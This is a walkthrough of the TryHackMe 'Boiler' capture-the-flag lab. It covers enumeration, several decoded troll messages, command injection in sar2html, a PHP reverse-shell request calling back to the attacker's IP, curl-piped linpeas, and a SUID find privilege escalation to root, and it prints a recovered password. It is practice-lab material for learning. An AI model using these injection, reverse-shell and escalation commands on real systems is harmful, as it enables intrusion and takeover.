THM - Boiler | An ordinary day

Introduction

Intermediate level CTF. Just enumerate, you’ll get there. Welp, let’s see if that’s true.

Ports

nmap says we’ve got 21 (FTP), 80 (HTTP), 10000 and 55007. Port 10000 is Webmin, and 55007 is SSH. Webmin is a web-based system configuration tool for Unix-like systems. Having SSH running on port 55007 is a timely reminder that just because it usually runs on port 22 doesn’t mean it has to.

FTP

The FTP server allows anonymous login, but nothing is obviously present. But checking ls -lash shows there is actually a hidden file. The content is:

Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!

This looks like a cipher, so we’ll decode it:

Just wanted to see if you find it. Lol. Remember: Enumeration is the key!

In this case the cipher was Rot13, and I’ve been trolled. :/

Rabbits

Visiting the webserver and checking robots.txt reveals several disallowed directories hinting at rabbit holes, and then provides a series of numbers:

079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075

Decoding decimal to ASCII gives:
OTliMDY2MGNkOTVhZGVhMzI3YzU0MTgyYmFhNTE1ODQK
Decoding from base64 gives:
99b0660cd95adea327c54182baa51584
Cracking the hash with john gives:
kidding
And again with the trolling. :/

Joomla

Running a dirbuster on the webservice we can see it’s running Joomla.

At /joomla/_files, we find this:
VjJodmNITnBaU0JrWVdsemVRbz0K
This is base64, and decodes to
Whopsie daisy.
Yes, trolled again. :/

sar2html

At /joomla/_test/index.php we find something called sar2html. Running searchsploit shows there is an RCE vulnerability with this, and we can run some commands like this: http://10.10.203.240/joomla/_test/index.php?plot=;whoami

In this way we can cat /etc/passwd, and see there are some users such as stoner and basterd.

We can also list the contents of /var/www/html/joomla, but more usefully we can use Burp repeater and get a reverse shell:

GET /joomla/_test/index.php?plot=;php+-r+'$sock%3dfsockopen("10.9.10.123",1234)%3bexec("/bin/sh+-i+<%264+>%264+2>%264")%3b' HTTP/1.1

root@kali:/opt/tryhackme/boiler# nc -nvlp 1234
listening on [any] 1234 …
connect to [10.9.10.123] from (UNKNOWN) [10.10.203.240] 54514
/bin/sh: 0: can’t access tty; job control turned off
$ python3 -c ‘import pty;pty.spawn(“/bin/bash”);’
www-data@Vulnerable:/var/www/html/joomla/_test$

Privesc

Once we’re in, we can get linpeas and pipe it to bash:

www-data@Vulnerable:/dev/shm$ curl http://10.9.10.123:8000/linpeas.sh | /bin/bash

This tells us that /usr/bin/find is vulnerable. Checking gtfobins we can see what needs to be done:

www-data@Vulnerable:/dev/shm$ /usr/bin/find . -exec /bin/sh -p \; -quit
/usr/bin/find . -exec /bin/sh -p \; -quit
whoami
root

And with that we can obtain the flags.

Other Users

Doing some more enumeration now we are root, we can see /home/basterd/backup.sh which contains credentials for stoner: USER=stoner:#superduperp@$$no1knows

The Shortcut

After I’d completed this, I checked someone else’s writeup and it seems like I was supposed to find a password in a file called log.txt with the sar2html exploit and then SSH in as basterd, then su to stoner, then do the find privesc. Oh well, nothing like taking a shortcut, that’s what hacking is yeah?